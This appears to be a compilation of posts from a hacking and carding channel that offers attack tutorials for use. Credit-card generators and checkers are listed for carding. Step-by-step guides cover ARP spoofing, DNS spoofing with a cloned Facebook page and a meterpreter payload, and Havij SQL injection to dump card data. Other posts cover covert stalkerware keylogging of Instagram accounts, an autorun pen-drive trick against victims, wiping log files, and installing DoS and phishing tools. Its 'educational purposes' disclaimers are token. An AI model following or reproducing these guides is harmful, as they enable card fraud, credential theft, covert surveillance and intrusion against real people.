Sites that provide Fake Identity | Sites that provide disposable mails for Email Verification | Sites that provide disposable numbers for SMS Verification

 πŸ”° *Sites that provide Fake Identity* πŸ”°


https://fakena.me

https://fauxid.com

https://www.fakexy.com [ New ]

https://www.elfqrin.com/fakeid.php

https://www.fakenamegenerator.com

https://www.fakepersongenerator.com

https://www.fakeaddressgenerator.com

https://datafakegenerator.com/generador.php [ New ]

http://namegenerators.org/fake-name-generator-gr [ New ]


πŸ”° *Sites that provide disposable mails for Email Verification* πŸ”°


https://maildrop.cc

https://tempr.email

https://tempmail.net

https://temp-mail.org

https://www.moakt.com

https://tempmailo.com [ New ]

https://www.emailondeck.com

https://www.guerrillamail.com

https://smailpro.com (+ temp Gmail) [ New ]

https://gmailnator.com (+ temp Gmail) [ New ]


πŸ”° *Sites that provide disposable numbers for SMS Verification* πŸ”°


http://hs3x.com

http://smsget.net

https://sms-online.co

https://catchsms.com

http://sms-receive.net

http://sms.sellaite.com

http://receivefreesms.net

https://receive-a-sms.com

http://receivesmsonline.in

http://receivefreesms.com

http://receivesmsonline.me

https://smsreceivefree.com

https://smsreceiveonline.com

https://receive-sms-online.com

https://www.receivesmsonline.net

https://www.temp-mails.com/number

https://www.freeonlinephone.org

https://getfreesmsnumber.com



Enjoy! Follow us for more...

Most Useful Websites For Carding

 πŸŒ€ πŸŒ€


πŸ’₯Cc Generators :-


πŸ“Œ https://freebinchecker.com

πŸ“Œ https://namso-gen.com

πŸ“Œ https://archive.li/gvfdN

πŸ“Œ https://bestccgen.com

πŸ“Œ https://elfqrin.com


πŸ’₯Cc Checkers :-


πŸ“Œ https://ccchecker.ga

πŸ“Œ https://bincodes.com 

πŸ“Œ https://freebinchecker.com 

πŸ“Œ https://mrchecker.net/card/ccn2

πŸ“Œ https://specialhacking.webcindario.com


πŸ’₯Temp Mail :-


πŸ“Œ https://tempmailin.com 

πŸ“Œ https://www.byom.de

πŸ“Œ https://smailpro.com

πŸ“Œ https://getnada.com 

πŸ“Œ https://spoofmail.de


πŸ’₯ Fake Address :-


πŸ“Œ https://fakeaddressgenerator.com

πŸ“Œ https://fakepersongenerator.com

πŸ“Œ https://fakenamegenerator.com 

πŸ“Œ https://bestrandoms.com

πŸ“Œ https://fakedetail.com


πŸ’₯ Iban Generators :-


πŸ“Œ https://iban.com

πŸ“Œ https://fake-it.ws


♨πŸ’’♨πŸ’’♨πŸ’’♨πŸ’’♨πŸ’’♨πŸ’’


⚠ This is Only For Educational Purposes. We aren't Support any Illegal Activities. 



Enjoy! Follow us for more...

Premium Links Generator WebSites


https://www.megaleech.us/

http://www.hubturkey.net/

http://kingofdown.com/

http://cbox1s.com/cbox.html

http://get4all.org/cbox/

http://aseanlegacy.net/cbox.html

http://getidn.net/

http://premiumtoss.com/

http://www.leechjet.com/

http://s05.cloudwebcopy.com/

http://cboxera.com/cbox.html

https://linksvip.net/


Enjoy! Follow us for more...

Get IP address of any snapchat user


Some prerequisites:

- MAC OS or Kali Linux

- A phone where you have snapchat on

- Some tools and a little MITM knowledge

- Nmap


Here goes:


Download Wireshark

Download arpspoof Here – MACOS only* – Kali linux has this already


TUT:

1)Fire up terminal and ip forward your laptop/pc with this scripts:

 Kali – “” sudo sysctl net.ipv4.ip_forward = 1 “”

 “” sudo net.ipv4.ip_forward = 1 “”

Mac – “” sudo sysctl -w net.inet.ip.forwarding=1 “”


2) Find your phone device local ip and write it down.

 Nmap -sn /24 ex. nmap -sn (or -sP) 192.168.0.1/24


3)Spoof your phone.arpspoof -i -t gateway

 ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1


4) Fire up Wireshark and filter on your phone ip with STUN protocol


        ip.addr == <phone ip> && stun


ex.   ip.addr == 192.168.0.160 && stun


5)    Call your victim on snap and keep calling him for around 5 seconds.


       THEY DO NOT NEED NECESSARY TO ANSWER

       You will see on wireshark some binding requests,  then some other STUN ones.


Credits:- internationalsuperhacker


❌ Copy with credit's else gay ❌


πŸ†˜ WARNING:- I AM NOT RESPONSIBLE BY ANY KIND OF ACTION DONE BY YOU THIS IS EDUCATIONAL PURPOSES ONLY.



Enjoy! Follow us for more...

How to open .onion links without onion browser(Tor)

Revealed content


You all know about onion extension and to open them you are required to install onion browser also called tor.

But did you know that you can open them in your normal browser. 

Yeah! It's true here are the steps you need to follow and open your desired site without tor.



πŸ”ΊMethod 1 - Using Onion.ws Gateway


Change your website extension to .onion.ws


Why? & how !


replacing .onion with .onion.ws in your browsers url bar, press go and you will be redirected to that darknet site without the need to download or configure any new software such as Tor and I2P.


πŸ”ΊMethod 2 - Using .onion chrome plugin/extension.


#Open Google Chrome and then go to your settings

#You will have to open chrome web store and download a plugin called "OnionLink .onion plugin"


Now you can easily surf onion links without any external browser.


πŸ”ΊMethod 3 - Using Tor2web gateway


Whenever you see a URL like http://duskgytldkxiuqc6.onion/, that's a Tor Onion service. Just replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct or any other domain made available by volounteers Tor2web operators Example:



https://duskgytldkxiuqc6.onion.to/

This connects you with Tor2web, which then talks to the onion service via Tor and relays the response back to you.



Enjoy! Follow us for more...

DNS Spoffing [Man in middle attack

 πŸŒ€  πŸŒ€


What Is DNS Spoofing?

DNS spoofing is an attack that can categorize under Man-In-The-Middle-Attack, beside DNS Spoofing MIMA contain:

-ARP poisoning

-Sessions hijacking

-SSL hijacking

-DNS Spoofing


Ill only be showing u DNS Spoofing , For now .. !


How does it work ?

Man in the middle attack means that the hacker will clone a specific web site such as facebook.com/twitter/google etc.... and force the victim to enter his cloned page , And phishe his login creedintals ... ( this only works on ur local connection ) Like , You can phishe People on the same router u are.

To under stand It more likely , Ill show u a pic for example:

Posted Image

I guess u got it ?



Requirements:

1-Linux operating system ( IMPORTANT )

2-Basic knowledge with Linux commands ( Important )

3-A brain ( SUPEREME INPORTANT)


First off ill be adding pics when i get some time , Cus its pain in the ass to show u every thing with pics .

Steps:

1-Setting Java applet attack / Clonning a specific web site " Ill clone facebook.com "

2-Setting the DNS spoofing blugin useing ettercap


First off:

We will open a terminal And type in


cd /pentest/exploits/set


Then


./SET


Now we will get our exploit on and running , Now we are going to choose it like so :


WebSite attack vectors/Java applet attack method /Clone web site / Enter the web site u want to clone ..

Then after it finish clonning , Use the

TCP reverse meter preter payload

Then we will use the following exploits : shikata_ga_nai


Insert an opened port after that ...

It will ask you to

create a Linux/OSX reverse_tcp meterpreter Java Applet payload also?

And we will type "no"


Then we are done for the java applet setting ....

Now comes the reall hacking

Open a new terminal and type


locate etter.dns


Then it will show u a directory of the tool


nano <Directory of the tool>



Without the <> ofc.

Now it will load the tool , We will scroll down till we see

3 lines with microsoft.com

Change them all to facebook.com without removed the *. in the 2nd line

And without closing this terminal , We will open a new one , And type


ifconfig


Now we will copy our local addrress its usually like


192.168.2.xxx



And ofc we will replace it with the ip's infront of the 3 lines of microsoft.com

Now we will press CTRL+O and type y And then y again untill it says

xx lines wrote

Then we will press CTRL+X

Then we will execute what we have done useing


ettercap -T -q -i eth0 -P dns_spoof -M arp // //


Then it will load our Etter cap Wink and then It will tell you

facebook.com spoofed to [192.168.2.xx]

Now every one on ur own local connection Visits facebook.com

and insert his infoz and login , You will be informated with the login infoz Wink.


Present by:-msijbkk


❌ Share and #pin our channel ❌

Increase Virtual RAM - To Make Your System Faster

 ⛩

Follow the steps given below :-


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.

Another way is Right-Clicking 'My Computer' and then Select 'Properties'.


2) Click on the 'Advanced' tab.


3) Under 'Performance', click 'Settings'.


4) Then click the 'Advanced' tab on the button that pops up.


5) Under 'Virtual Memory' at the bottom, click 'Change'.


6) Click the 'Custom Size' button.


7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).


8) Click 'Set', and then exit out of all of the windows.


9) Finally, Restart your computer.


10) You now have a faster computer and 1-2GB of Virtual RAM..!

✖️✖️

Enjoy! Follow us for more...

Instagram Hacking with Spyzie and mSpy

 **

Method 1: Hacking Instagram with a tracking app(recommended)


Hacking Instagram with Spyzie


Spyzie  is the  best app to help you find out Instagram passwords and real-time chat access effortlessly. Available for Android (no root access required) and iOS (no jailbreak required). Unfortunately, this application is not free. But installing Spyzie is very simple.


This application also has a keylogger that gives access to everything that is typed on the target's device. Follow the steps below to learn how to hack Instagram with Spyzie.


Step 1:  Create an account at  my.spyzie.com



Step 2:  You will receive a confirmation email to your email that should contain your login details.


Step 3:  Install the app on the target device. Try the demo if you don't understand the installation.


Step 4:  After successful installation, go to the control panel using the details that were attached in the email.



Step 5:  Access keylogger functions directly from the application menu. All that remains is to wait until your target goes to Instagram. You will receive an in-app notification as soon as this happens. You can view the connection details from your PC. After the keylogger does its part and you receive the victim's password and username, you will be able to access your target's Instagram account and be able to track their activity without her knowledge.


Method2 : Hacking Instagram using Mspy (for Android you need root, and for iOS you need jailbreak)


Follow the steps below to learn how to hack with Mspy:


Step 1:  Go to  mspy.com  and buy the bundle you need.



Step 2:  You should receive a confirmation email and login details.


Step 3:  Check out the demo of the mspy app to get an idea of ​​how it works.


Step 4:  Next, install the app on your target's device. And you will access it through your control panel.


Step 5:  Access Instagram features to view posts and photos.


Step 6:  Using the functions of a keylogger, follow the Instagram account without the knowledge of the victim. After you find out the target's username and password, log in to their account via a computer.


Method3 : Hacking Instagram with FlexiSpy


Step 1:  Go to  https://www.flexispy.com , select the type of device you want to monitor and buy the bundle you need. To keep track of the correspondence on Instagram, the Premium tariff will be  enough . Click Buy Now.



Step 2:  Next, you will see a warning that you will need to jailbreak to track iOS devices. If you know how to do this (it takes 5 minutes) - great, click "I understand", if not - click "online chat", the support service will quickly advise and help you.



Step 3:  Then you will be redirected to the purchase page. We draw your attention to the fact that the application installation service is not obligatory for payment and can be deleted if you cope with it yourself following simple instructions.




Step 4:  Fill in the correct email (through which you will be able to access your personal account, as well as instructions for installing and configuring the application), as well as information about yourself and the method of payment. Click "Checkout".



Step 5:  After paying for the order, follow the instructions that will come to your mail (unless, of course, you used the paid installation and setup of the application).


Step 6:  After installing the application on the monitored device, you can easily access your Instagram messages from your personal account on the Flexispy website.



Good luck! We recommend using  FlexiSpy ! 


Method 4: Crack Password Using Phishing


Phishing is one of the most popular and promising hacking tricks. In order to hack your victim using phishing, you need to make a fake Instagram login page and drop your target's link. After the target tries to enter, its data will be saved to a separate file, and the victim will be redirected to the original Instagram page. Below is an example of a fake login page. To determine if this is a fake page, just look at the URL. It doesn't match Instagram.com


Enjoy! Follow us for more...

The purpose of the VPN


Download now 

Enjoy! Follow us for more...

VPN Deployment Types

 

Download now


Enjoy! Follow us for more...

How To Get Free Credit Card Using Havij


Note : This post is only for Educational Purpose.

Requirements

1. Havij 1.16 Pro

3. SQLi-DB 

4. Carding Dorks

5. Vulnerable Sites


Let’s divide this tutorial into two part first to find vulnerable sites and second to get data from these sites




Pt1.  How To Find Vulnerable Sites ?


First we are going to find shopping sites I mean vulnerable site. To find vulnerable sites, you need to use the SQLi-DB and the carding dorks. Let’s do it step by steps.


Step 1. Copy one of the dork, i m using inurl:/merchandise/index.php?cat= and paste it in SQLi-DB.


Step 2. Set up the setting and click on the “ scan ” button. This is not high level setting, it is simple choose search engine, duplicate result should be removed or not. Set it yourself.

scan-code


Step 3. Once you set it all, start scanning, the result will be shown in the screenshot as below:

result-list


Step 4. Click on Vulnerable to filter the result and only show the vulnerable results. Bingo! Boom you completed your first task.

valunerable-sites-list


Getting Data From Vulnerable Site:


Now, you need to run Havij as administrator and follow the steps below


Step 1. Paste the vulnerable site in the target TextBox on Havij and click Analyze .


Step 2. Once the process finished, you will see something like in the image below on your Havij log box.

havij-log-box


Step 3. Click on Tables then Get Tables and you will see all the tables that are in the database.

havij-tables


Step 4. Now, look for a table named “ Orders ” or something similar. Tick the table and click on Get Columns.

in-column-save-order


Step 5. You will get the columns that are in the table “Orders”. Now tick on something that related to credit cards information, such as cc_number, cc_type, cc_expired_year, cc_expired_month, and cvv or cvv2 . Once you’re done, click on Get Data.

credit-card-information-data


Step 6. Just wait for the dumping progress and you will get the information.



Enjoy! Follow us for more...

GENERATES FAKE TEMPORARY INTERNATIONAL NUMBERS


1. VIRTUAL SIM

https://play.google.com/store/apps/details?id=com.virtualsimapp


2. SMARTCALL

https://www.mediafire.com/download/spowk1aramg9vrz


3. TALK2

https://play.google.com/store/apps/details?id=com.voyagerinnovation.talk2


4. PRIMO

https://play.google.com/store/apps/details?id=com.primo.mobile.android.app


5. FREE TONE

https://play.google.com/store/apps/details?id=com.textmeinc.freetone


6. HUSHED

https://play.google.com/store/apps/details?id=com.hushed.release


7. GROOVE IP CALL

https://play.google.com/store/apps/details?id=com.snrblabs.grooveip


8. TALKTONE 5.4.4

https://www.mediafire.com/download/8ldppguxt8eprfx


9. SWYTCH

https://play.google.com/store/apps/details?id=com.swytch.mobile.android




Enjoy! Follow us for more...

How to unsubscribe All YouTube Channel at Single click

 πŸ˜  😍


.......... Follow this Steps ...........


1. Click or type this link in web browser

 https://www.youtube.com/feed/channels (in pc only)


2. right click there and click on inspect and go to console section


3. copy and paste this code πŸ‘‡


Code:

var i = 0;

var count = document.querySelectorAll("ytd-channel-renderer:not(.ytd-item-section-renderer)");


myTimer();


function myTimer () {

    if (count == 0) return;


    el = document.querySelector('.ytd-subscribe-button-renderer');

    el.click();


    setTimeout(function () {

        var unSubBtn = document.getElementById("confirm-button").click();

        i++;

        count--;


        console.log(i + " unsubscribed");

        console.log(count + " remaining");


        setTimeout(function () {

            el = document.querySelector("ytd-channel-renderer");

            el.parentNode.removeChild(el);


            myTimer();

        }, 250);

    }, 250);

}


4. Now Hit Enter


5. Congratulation you Successfully Unsubscribe All your youtube channel




Enjoy! Follow us for more...

How to install brutal in termux ?

 Brutal = this is a toolkit to quickly create various payload, powershell attack, virus attack.and launch listener for a human interface devices..this is extreamly useful for executing scripts on a target machin..


For use this tool you must install sudo in your termux


means it need rooted devices..


Installation :


$ apt update && apt upgrade


$ apt install git 


$ git clone https://github.com/Screetsec/Brutal


$ cd Brutal


$ chmod +x *


Run :


$ sudo ./Brutal.sh


Now simply select your option which you want..





Enjoy! Follow us for more...

How to lock and unlock your pc with USB drive like a hacker


Anyone who attempts to access your computer without the USB flash drive will be hit with an epic “Access Denied” message. To get started, follow this guide:


❤Step 1: Download and install Predator.

https://www.predator-usb.com/predator/en/index.php?n=Main.DownloadPro


❤Step 2: Once Predator launches, plug in your USB flash drive. None of the contents of the drive will be deleted or altered in any way, so feel free to use your primary thumbdrive.


When you insert the drive, a dialog box will appear asking you to create a password. Click OK to continue.


❤Step 3: In the Preferences window, take note of a few key settings. First, enter a secure, unique password in the “New password” field. If you lose your USB drive, you’ll use it to unlock your computer.


If you’d like, you can check the Always Required box and you’ll be asked to enter the password each time you use your thumbdrive to unlock your PC.


Finally, in the section under Flash Drives, ensure that the correct USB flash drive is selected. When you’re done, click “Create key” and then OK.


❤Step 4: Predator will exit. When it does, click the Predator icon in the taskbar to restart the program. A few seconds later, the icon will turn green, alerting you that Predator is running.


Every 30 seconds, Predator will check to see that your USB drive is plugged in. If it isn’t, your computer will dim and lock down.

❤❤❤❤❤❤❤❤❤❤❤


πŸ”₯How To Shutdown Computer Using PendriveπŸ”₯


❤Step 1:>>copy this  code into notepad:


@echo off

shutdown -s -t 00

Save as mrmythic.bat extension (for eg: clickme.bat).


❤Step 2:


Now open the notepad and copy this code:


[autorun]

Open=filename.bat

Action=Mouse Disable


Save it as “autorun.inf”


//don’t forget to change the “filename.bat” with your filename.bat.


❤Step 3:

Then copy the two files in your pen drive or victim’s pen drive.


That’s all whenever the victim insert his pen drive,the system will be turned off automatically.


Enjoy! Follow us for more...

INSTALL RECON DOG {error fixed} IN TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================


========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

=========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

Recon Dog is an all in one tool for all your basic information gathering needs.

It uses APIs to gather all the information

so your identity is not exposed.

========================

INSTALLATION:

========================

METHOD 1

$ apt update && apt upgrade

$ apt install git

$ apt install python2

$ git clone https://github.com/UltimateHackers/ReconDog

$ cd ReconDog

$ chmod +x *

usage :


python2 dog.py


Now select your option which you want..


========================

METHOD 2

========================

$ pkg update

$ pkg upgrade

$ apt install git

$ apt install python

$ apt install python2

$ git clone https://github.com/s0md3v/ReconDog.git

$ cd ReconDog

$ chmod +x *

$ pip install -r requirements.txt

$ python dog



Enjoy! Follow us for more...

INSTALL GoldenEye IN TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================

========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

=========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

GoldenEye


GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!


GoldenEye is a HTTP DoS Test Tool.


Attack Vector exploited: HTTP Keep Alive + NoCache


Installation :


$ apt update && apt upgrade


$ apt install git


$ apt install python2


$ git clone https://github.com/jseidl/GoldenEye


$ cd GoldenEye


$ chmod +x *


Run :


$ python2 goldeneye.py



Enjoy! Follow us for more...

How To Wipe Files Or Filesystem On Linux

 ⚠️HP TECH ⚠️

➖ TUTORIAL ➖

since I got a wonderful support on my last wipe tutorial series, here is another tutorial.


We all use computers and laptops. Some people are booting their computer without encryption, some use bitlocker, veracrypt or bios password. There is not a completely protection. Sure you can encrypt your whole system but what's more difficult than restore an encrypted wiped system? — Right, nothing.


On linux (thanks peter gutmann) we have the package »wipe«. 

If pre-installed on kali, i don't know if it is pre installed on another system but on kali it is. 


View the version: 

mrblackx@kali:~$ wipe -v

This is wipe version 0.23.


Make sure you use sudo on the different wipes.


Delete Files Without Confirmation

For this feature we are using -f = force.


Example :

mrblackx@kali:/tmp/test_folder$ wipe -f test.txt 

Wiping test.txt, pass 34 (34)   

Operation finished.                                                           

1 file wiped and 0 special files ignored in 0 directories, 0 symlinks removed but not followed, 0 errors occurred.


Remove Directory Trees

It is deleting a directory + subdirectories. (No systemlinks!)

-r = recurse


Example:

mrblackx@kali:/tmp$ wipe -fr test_folder/

Operation finished.

0 files wiped and 0 special files ignored in 5 directories, 0 symlinks removed but not followed, 0 errors occurred.


Permission Problems

If you have permission problems, maybe because you set wrong permission with chmod. You can solve this with -c = chmod 

(no example because i don't need to show)


Print Errors

You can print errors with -i = informational aswell known as verbose output if you don't want any output only errors, you can aswell use -s = silent mode.


Quick Wipe & Passes

You can define a quick wipe (only 4 passes) or define the passes by yourself. Let's assume you want 10 passes, well you have to use following syntax : -qQ <10>. The default quick wipe passes, as already mentioned are 4.


Example:

mrblackx@kali:/tmp$ wipe -fqQ 10 viperzcrew.txt 

Wiping viperzcrew.txt, pass 9 in quick mode   

Operation finished.                                                           

1 file wiped and 0 special files ignored in 0 directories, 0 symlinks removed but not followed, 0 errors occurred.


Abort If Error

You can abort the operation if any error happen, this could be either useful or useless. Depends for which reason you wipe your files/system. For here you can use -a = abort on error.


Keep Files

If you want to keep linked files, which has been overwritten you can use -k


➕ ADVANCED STUFF ➕


Random Seeds

If you run echo /dev/random then you can see, it's fucking random. With -S you can change this option to different options. Please only use -S if you know what you are doing:


-S r = This is used for regular files or devices.

-S c =  Output will be md5 hashed.

-S p = The least secure setting, it won't use random strings.


The Length Of Blocks

Some block devices have problems with their size, floppy disks or tapes, use the -l <length> option to define a length. You can use K(kilo) - 1024,M(mega) - 1048576,G(giga) - 1073741824,B(block) - 512


You can also visit the MAN Page which i have this all information from above. (It is easy to understand). 


Example: 


sudo wipe -fiqQ 20 /var/logs/*

(Remove All Log Files + Subdirectories With 20 Passes Quickly And Forced)


ENJOY! Follow us for more...

What is Enumeration ?

 Enumeration belongs to the first phase of Ethical Hacking, i.e., “Information Gathering”. This is a process where the attacker establishes an active connection with the victim and try to discover as much attack vectors as possible, which can be used to exploit the systems further.


Enumeration can be used to gain information on −


Network shares

SNMP data, if they are not secured properly

IP tables

Usernames of different systems

Passwords policies lists

Enumerations depend on the services that the systems offer. They can be −


DNS enumeration

NTP enumeration

SNMP enumeration

Linux/Windows enumeration

SMB enumeration

Let us now discuss some of the tools that are widely used for Enumeration.


NTP Suite

NTP Suite is used for NTP enumeration. This is important because in a network environment, you can find other primary servers that help the hosts to update their times and you can do it without authenticating the system.


enum4linux

enum4linux is used to enumerate Linux systems. Take a look at the following screenshot and observe how we have found the usernames present in a target host.


enum4linux


smtp-user-enum

smtp-user-enum tries to guess usernames by using SMTP service. Take a look at the following screenshot to understand how it does so.


SMTP


Quick Fix

It is recommended to disable all services that you don’t use. It reduces the possibilities of OS enumeration of the services that your systems are running.



Enjoy! Follow us for more...

How to get 100% anonymity in Android



Check your anonymity level using this site  https://whoer.net/


πŸ€Then follow this simple step. 


1, download Firefox from Google play store

2, open any premium vpn( i preferred express vpn) and connect to usa

3,open Firefox and click add-ons 

4 and search Disable WebRTC then install it. 

5, go to your android setting and change timezone to eastern daylight

6, if your default language is different from English change to English language.

7, go to https://whoer.net/ and check your anonymity level then it must say 100% anonymity level, if u follow these steps properly


Note: you can use this guide for any country location in ur vpn. only change the time zone according to vpn location and then ur anonymity will be 100%


E N J O Y ! Follow us for more...



INSTALL DARKSPLOIT IN TERMUX {NO ROOT}

 ===========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR YOUR ACTIONS

===========================

Usage of this tool for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws.I assume no liability and I'm not responsible for any misuse or damage caused by this program.

===========================


===========================

$ pkg update

$ pkg upgrade

$ apt install git

$ apt install python

$ apt install python2

$ git clone https://github.com/anthrax3/DarkSploit.git

$ cd DarkSploit

$ cd Install

$ sh installtermux.sh

$ pip2 install -r requirements.txt

$ cd ..

$ python2 DrXp.py

$ show options


===========================

Enjoy! Follow us for more...

How to Disable the Use of USB Storage Devices in Windows 10

 

If you want to prevent others from copying important materials/files from your computer through USB storage devices, it’s a good idea to disable the use of USB storage devices on your computer. To do this, you can simply restrict access to removable storage disks, or completely prevent removable storage devices from connecting to your computer through the USB port. Now, this post will show you the two options to disable the use of USB storage devices on Windows 10 computer.


Option 1: by Group Policy Editor


Option 2: by Registry Editor


Option 1: Disable/restrict access to USB storage devices by Group Policy Editor


Step 1: Open Local Group Policy Editor in Windows 10 by running gpedit.msc in Run (Win + R) dialog box.



Step 2: Expand Computer Configuration > Administrative Templates > System, and select Removable Storage Access. On the right-side pane, locate ”Removable Disks: Deny execute access”, ”Removable Disks: Deny read access”, and ”Removable Disks: Deny write access”. Double-click on each of them to configure it.



Step 3: Select Enabled, then click Apply and click OK. This will disable execute, read, and write access to any removable disks including USB storage devices connected to the computer. If you want to enable the use of USB storage devices, set it to ”Not configured” or ”Disabled”.



Option 2: Disable the use of USB storage devices by Registry Editor


Step 1: Open Registry Editor in Windows 10 by running regedit in the Run dialog box.



Step 2: Go to Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR, and then locate the DWORD value named ”Start” on the right-side pane. The default value data of Start is ”3”. Double-click on Start, and set its value data to ”4”.



Step 3: Restart Windows 10 for the changes to take effect. This will prevent any USB storage device from connecting to the computer, and thus disable the use of USB storage devices on the computer.


Note: By Registry Editor, you just disable the use of USB storage devices, but it won’t affect the use of USB mouse, keyboard, and printer on the computer.


Enjoy! Follow us for more...

INSTALL HX WHATSAPP IN TERMUX {NO ROOT}

 ===========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR YOUR ACTIONS

===========================

Usage of this tool for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws.I assume no liability and I'm not responsible for any misuse or damage caused by this program.

===========================

I CAN GUARANTEE YOU WILL BE CAUGHT

===========================

Hacking and Everything is a crime Plz Do At Your Own Risk. There Is neither My Responsiblity nor my tool. This tool is only for Educational Purpose.

===========================

===========================

$ pkg update && pkg upgrade

$ pkg install git

$ pkg install python2

$ git clone https://github.com/Bl4ckDr460n/HxWhatsApp.git

$ cd HxWhatsApp

$ python2 HxWhatsApp.py


==========================



Enjoy! Follow us for more...

INSTALL HIDDENEYE IN TERMUX {NO ROOT}

 ===========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR YOUR ACTIONS

===========================

Usage of this tool for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws.I assume no liability and I'm not responsible for any misuse or damage caused by this program.

===========================

I CAN GUARANTEE YOU WILL BE CAUGHT

===========================

Hacking and Everything is a crime Plz Do At Your Own Risk. There Is neither My Responsiblity nor my tool. This tool is only for Educational Purpose.

===========================

===========================

$ pkg update

$ pkg upgrade

$ pkg install git python php curl openssh grep

$ apt install python

$ apt install python2

$ git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

$ chmod 777 HiddenEye

$ cd HiddenEye

$ chmod +x *

$ pip install -r requirements.txt

$ python HiddenEye.py




Enjoy! Follow us for more...


Change Your Friends’ Profile Picture

========================

PLEASE DONT DO ANYTHING STUPID WITH WHAT I'M ABOUT TO TEACH YOU!!! I WILL NOT BE RESPONSIBLE IF YOUR FRIEND GETS MAD AT YOU AND PLEASE DONT GET CAUGHT!!YOUR FRIEND WILL KILL YOU ALONEπŸ˜‚

========================

You can change your friend’s profile pic into your WhatsApp on your mobile only but not globally .


Step1:

   Choose a funny profile picture for your friend.

Step2:

   Resize the image to 561×561 pixels and name it with your friend’s mobile phone number.

Step3:

   Save the image in SD card -> WhatsApp -> Profile Pictures.

Step4:

   Overwrite an existing image if required.

Step5:

   Disable WiFi and data network. If you don’t WhatsApp will automatically update the picture.

Step6:

   Now show it to your friend who’ll surely shocked to see his changed image.

========================


Enjoy! Follow us for more...

INSTALL XAttacker in TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================


========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

=========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

XAttacker is used to check the security by finding the vulnerability in your website or you can use this tool to Get Shells | Sends | Deface | cPanels | Databases


1. $ apt update

2. $ apt upgrade

3. $ pkg install perl

4. $ git clone https://github.com/Moham3dRiahi/XAttacker


Usage:

1. $ cd XAttacker

2. $ perl XAttacker.pl


========================

Enjoy! Follow us for more...

INSTALL HIDDEN EYE IN TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================


========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

Hidden Eye is a tool that contain a variety of online attacking tools such as Phishing, Keylogger, Information gathering, etc. Hidden Eye used to perform plenty of online attacks on user accounts. By using Hidden Eye you can have your target live information such as IP ADDRESS, Geolocation, ISP, Country, & many more.

========================

Installation:

========================

$ apt-update && apt upgrade -y

$ pkg install git python php curl openssh grep

$ git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

$ chmod 777 HiddenEye

$ pip install requests

$ cd HiddenEye

